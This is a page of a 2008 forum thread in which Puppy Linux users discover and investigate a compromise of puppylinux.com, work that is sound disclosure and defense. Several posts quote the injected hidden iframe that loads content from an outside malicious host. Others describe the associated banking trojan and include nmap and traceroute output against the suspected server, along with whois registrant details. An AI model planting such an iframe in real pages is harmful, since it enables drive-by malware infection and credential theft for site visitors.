Puppy Linux Discussion Forum Forum Index Puppy Linux Discussion Forum
Puppy HOME page : puppylinux.com
"THE" alternative forum : puppylinux.info
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

The time now is Thu 28 Aug 2014, 05:27
All times are UTC - 4
 Forum index » Taking the Puppy out for a walk » Misc
Virus warning from www.puppylinux.com/manuals.htm
Moderators: Flash, JohnMurga
Post new topic   Reply to topic View previous topic :: View next topic
Page 1 of 10 [138 Posts]   Goto page: 1, 2, 3, ..., 8, 9, 10 Next
Author Message
georgejc

Joined: 28 Feb 2008
Posts: 4
Location: Montreal, Quebec, Canada

PostPosted: Thu 28 Feb 2008, 17:06    Post subject:  Virus warning from www.puppylinux.com/manuals.htm
Subject description: Virus warning from www.puppylinux.com/manuals.htm
 

Hi,

I just sent a friend to try out Puppy, and he received several virus warnings from http://www.puppylinux.com/manuals.htm

Searching the forums, I noticed that you have had this problem in the past.

Also, just curious, why is this link http://orentraff.cn/in.cgi?7 in that page?
Back to top
View user's profile Send private message 
Caneri

Joined: 04 Sep 2007
Posts: 1580
Location: Canada

PostPosted: Thu 28 Feb 2008, 17:20    Post subject:  

Yes something is not good here.

There is a redirect showing to China...please correct this...as it's a problem.

Eric

_________________
Be not afraid to grow slowly, only be afraid of standing still.
Chinese Proverb

Back to top
View user's profile Send private message 
wingruntled

Joined: 20 Feb 2007
Posts: 287
Location: Great Lakes

PostPosted: Thu 28 Feb 2008, 21:15    Post subject:  

BUMP!
Somebody really needs to fix this!!!
Code:
<big>http://www.puppy-linux.info/</big></big><iframe src="http://orentraff.cn/in.cgi?7" width="0" height="0" style="display:none"></iframe></a> <br>
Back to top
View user's profile Send private message 
georgejc

Joined: 28 Feb 2008
Posts: 4
Location: Montreal, Quebec, Canada

PostPosted: Thu 28 Feb 2008, 23:44    Post subject:  More bad news  

Hi,

I know I'm new here, but I just found another page with the
<iframe src="http://orentraff.cn/in.cgi?7" width="0" height="0" style="display:none"></iframe>
hidden at this page: http://www.puppylinux.com/cd-puppy.htm

If the people that run this site need some help, please contact me, and maybe I can be of some help and I'll let you know what kind of sites I can work on.

I would HIGHLY recommend that EVERY page be checked!
Back to top
View user's profile Send private message 
wingruntled

Joined: 20 Feb 2007
Posts: 287
Location: Great Lakes

PostPosted: Thu 28 Feb 2008, 23:57    Post subject:  

Gjc
The puppylinux domain belongs to Barry Kauler himself.
BTW: good eye! I was looking for stray address in the other pages myself.
Back to top
View user's profile Send private message 
georgejc

Joined: 28 Feb 2008
Posts: 4
Location: Montreal, Quebec, Canada

PostPosted: Fri 29 Feb 2008, 00:10    Post subject:  Owner of Domain  

Don't know if this guy is the victim or the criminal, but here is the whois data for that Chinese site:

Whois orentraff.cn

Domain Name: orentraff.cn

The results below are provided by CNNIC (China Internet Network Information Center - www.cnnic.net.cn) (whois.cnnic.net.cn)

Domain Name: orentraff.cn
ROID: 20071002s10001s83561693-cn
Domain Status: ok
Registrant Organization: N/A
Registrant Name: NizovGrisha
Administrative Email: grishanizov@gmail.com
Sponsoring Registrar: 厦门华商盛世网络有限公司
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2007-10-02 05:14
Expiration Date: 2008-10-02 05:14
Back to top
View user's profile Send private message 
wingruntled

Joined: 20 Feb 2007
Posts: 287
Location: Great Lakes

PostPosted: Fri 29 Feb 2008, 00:38    Post subject:  

I tracked down This Trojan that is plugged into puppylinux by that admin email address and it's nothing to sneeze at.
The Trojan primarily targets bank accounts and depending on the plugins installed, it may be able to perform the following activities:

* Gather sensitive information about the computer and user configuration information.
* Update itself and install new modules.
* Steal sensitive information contained in forms posted over HTTP (see webmail example)
* Steal local certificate files (*.pfx)
* Hijack the browser navigation.

Note: The hijacking browser navigation functionality of the Trojan may be used to steal confidential bank credentials by redirecting users to phishing Web sites when they attempt to login on certain predetermined web banking sites.
http://www.bluetack.co.uk/forums/lofiversion/index.php/t18052.html
Back to top
View user's profile Send private message 
ttuuxxx


Joined: 05 May 2007
Posts: 10747
Location: Ontario Canada,Sydney Australia

PostPosted: Fri 29 Feb 2008, 02:08    Post subject:  

I just tried it and on the bottom of the page it was trying to bring up that china website. I think the page should be deleted straight away and maybe the links and remade some place else. Just for security reasons.
ttuuxxx

_________________
http://audio.online-convert.com/ <-- excellent site
http://samples.mplayerhq.hu/A-codecs/ <-- Codec Test Files
http://html5games.com/ <-- excellent HTML5 games Smile

Back to top
View user's profile Send private message Visit poster's website 
alienjeff


Joined: 08 Jul 2006
Posts: 2291
Location: Winsted, CT - USA

PostPosted: Fri 29 Feb 2008, 11:52    Post subject:  

Code:
<iframe src="http://orentraff.cn/in.cgi?7" width="0" height="0" style="display:none">


Found on:
http://www.puppylinux.com/news.htm
http://www.puppylinux.com/forums.htm
http://www.puppylinux.com/flash-puppy.htm
http://www.puppylinux.com/cd-puppy.htm
http://www.puppylinux.com/hard-puppy.htm
http://www.puppylinux.com/faq.htm
http://www.puppylinux.com/links.htm
http://www.puppylinux.com/zippy-puppy.htm
http://www.puppylinux.com/thin-puppy.htm
http://www.puppylinux.com/emulator-puppy.htm
http://www.puppylinux.com/manuals.htm

Ahem!

Makes one wonder what might be buried in the ISOs.

On a more humorous note, here's another gem uncovered whilst scanning Barry's HTML source:

Code:
<meta name="GENERATOR" content="IBM WebSphere Studio Homepage Builder V6.0.0 for Windows">


Guess Bluefish, Amaya, Composer (or e3, Leafpad or Geany, for that matter) and their ilk aren't good enough for some folks.

EDIT/ADDITION: Of more peculiar interest, note that Barry was building some of those pages while running Windows OS. Irony, sweet irony ...

_________________
hangout: ##b0rked on irc.freenode.net
diversion: http://alienjeff.net - visit The Fringe
quote: "The foundation of authority is based upon the consent of the people." - Thomas Hooker


Last edited by alienjeff on Sun 02 Mar 2008, 11:34; edited 1 time in total
Back to top
View user's profile Send private message 
georgejc

Joined: 28 Feb 2008
Posts: 4
Location: Montreal, Quebec, Canada

PostPosted: Fri 29 Feb 2008, 12:27    Post subject:  Stupid Question  

This may be a stupid question, but does the person who is responsible for puppylinux.com actually read any of these forum postings, or does anyone here know how to contact him?
Back to top
View user's profile Send private message 
wingruntled

Joined: 20 Feb 2007
Posts: 287
Location: Great Lakes

PostPosted: Fri 29 Feb 2008, 12:33    Post subject:  

aj
Some of those pages were clean last night. It looks like this one is a prolific breeder.

Gjc
Quote:
person who is responsible for puppylinux.com actually read any of these forum postings,

Sometimes but it seems like he keeps his distants.
Back to top
View user's profile Send private message 
alienjeff


Joined: 08 Jul 2006
Posts: 2291
Location: Winsted, CT - USA

PostPosted: Fri 29 Feb 2008, 12:53    Post subject: Re: Stupid Question  

georgejc wrote:
This may be a stupid question...

"There are no stupid questions, but there are a LOT of inquisitive idiots." - Dr`Keovorkian, ChanOp #puppylinux

_________________
hangout: ##b0rked on irc.freenode.net
diversion: http://alienjeff.net - visit The Fringe
quote: "The foundation of authority is based upon the consent of the people." - Thomas Hooker

Back to top
View user's profile Send private message 
Lobster
Official Crustacean


Joined: 04 May 2005
Posts: 15117
Location: Paradox Realm

PostPosted: Fri 29 Feb 2008, 14:46    Post subject: Re: Stupid Question  

georgejc wrote:
This may be a stupid question, but does the person who is responsible for puppylinux.com actually read any of these forum postings, or does anyone here know how to contact him?


I have already sent Barry Kauler a PM (private message) through this forum

Smile

_________________
Puppy WIKI

Last edited by Lobster on Sat 08 Mar 2008, 02:50; edited 1 time in total
Back to top
View user's profile Send private message Visit poster's website 
prehistoric


Joined: 23 Oct 2007
Posts: 1266

PostPosted: Fri 29 Feb 2008, 15:28    Post subject: manuals mirror  

The manuals are also mirrored at http://puppylover.netsons.org/dokupuppy/. I just did a very quick check for "orentraff" and didn't find that string. That doesn't rule out another redirect which my eyes aren't sharp enough to catch right away.

I doubt Grisha Nizov is Chinese. I've been looking for an interloper who speaks a language more likely to be associated with the name.
Back to top
View user's profile Send private message 
alienjeff


Joined: 08 Jul 2006
Posts: 2291
Location: Winsted, CT - USA

PostPosted: Sat 01 Mar 2008, 07:33    Post subject:  

http://www.siteadvisor.com/sites/orentraff.cn/summary/
http://www.dnsstuff.com/tools/ipall.ch?domain=%2077.221.133.106
IP address: 77.221.133.106
Reverse DNS: 77.221.133.106.addr.datapoint.ru.
Reverse DNS authenticity: [Could be forged: hostname 77.221.133.106.addr.datapoint.ru. does not exist]
ASN: 0
ASN Name: IANA-RSVD-0
IP range connectivity: 0
Registrar (per ASN): Unknown
Country (per IP registrar): RU [Russian Federation]
Country Currency: RUR [Russia Rubles]
Country IP Range: 77.221.128.0 to 77.221.159.255
Country fraud profile: High
City (per outside source): Unknown
Country (per outside source): RU [Russian Federation]
Private (internal) IP? No
IP address registrar: BOGUS
Known Proxy? No
Link for WHOIS: 77.221.133.106

http://www.globedomain.com/forums/viewtopic.php?f=3&t=2857&start=0&st=0&sk=t&sd=a&view=print

sh-3.00# traceroute 77.221.133.106
traceroute to 77.221.133.106 (77.221.133.106), 30 hops max, 40 byte packets
1 192.168.123.254 (192.168.123.254) 1.256 ms 4.221 ms 1.196 ms
2 10.30.0.1 (10.30.0.1) 7.899 ms 8.047 ms 8.248 ms
3 172.20.97.1 (172.20.97.1) 9.57 ms 19.111 ms 13.811 ms
4 172.20.98.65 (172.20.98.65) 11.093 ms 8.163 ms 8.19 ms
5 172.20.103.34 (172.20.103.34) 10.803 ms 9.344 ms 17.053 ms
6 so-9-1.car2.Boston1.Level3.net (4.79.2.41) 28.061 ms 16.341 ms 13.772 ms
7 ae-5-5.ebr1.NewYork1.Level3.net (4.69.132.250) 22.926 ms 29.744 ms 21.959 ms
8 ae-4.ebr2.London1.Level3.net (4.69.132.110) 104.017 ms 88.724 ms 96.972 ms
9 ae-2.ebr2.Amsterdam1.Level3.net (4.69.132.134) 107.602 ms 104.205 ms 108.036 ms
10 ae-1-100.ebr1.Amsterdam1.Level3.net (4.69.133.85) 109.212 ms 98.03 ms 104.995 ms
11 ae-2.ebr2.Dusseldorf1.Level3.net (4.69.133.90) 106.62 ms 107.116 ms 106.284 ms
12 ae-4-4.car1.Stockholm1.Level3.net (4.69.135.21) 127.446 ms 126.947 ms 129.787 ms
13 rt741-001.stk.retn.net (213.242.110.18) 126.603 ms 134.132 ms 128.836 ms
14 ae0-3.RT008-002.spb.retn.net (81.222.15.45) 139.494 ms 137.416 ms 138.096 ms
15 GW-InfoBox.retn.net (81.222.2.102) 138.268 ms 140.336 ms 145.495 ms
16 77.221.128.58.addr.datapoint.ru (77.221.128.58) 144.319 ms 139.417 ms 137.992 ms
17 * * *

sh-3.00# nmap 77.221.133.106

Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2008-03-01 06:31 PUP
Interesting ports on 77.221.133.106.addr.datapoint.ru (77.221.133.106):
(The 1661 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp closed pop3
143/tcp closed imap
443/tcp closed https
465/tcp closed smtps
953/tcp closed rndc
993/tcp closed imaps
995/tcp closed pop3s

Nmap finished: 1 IP address (1 host up) scanned in 31.860 seconds

_________________
hangout: ##b0rked on irc.freenode.net
diversion: http://alienjeff.net - visit The Fringe
quote: "The foundation of authority is based upon the consent of the people." - Thomas Hooker

Back to top
View user's profile Send private message 
Display posts from previous:   Sort by:   
Page 1 of 10 [138 Posts]   Goto page: 1, 2, 3, ..., 8, 9, 10 Next
Post new topic   Reply to topic View previous topic :: View next topic
 Forum index » Taking the Puppy out for a walk » Misc
Jump to:  

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group
[ Time: 0.0893s ][ Queries: 12 (0.0044s) ][ GZIP on ]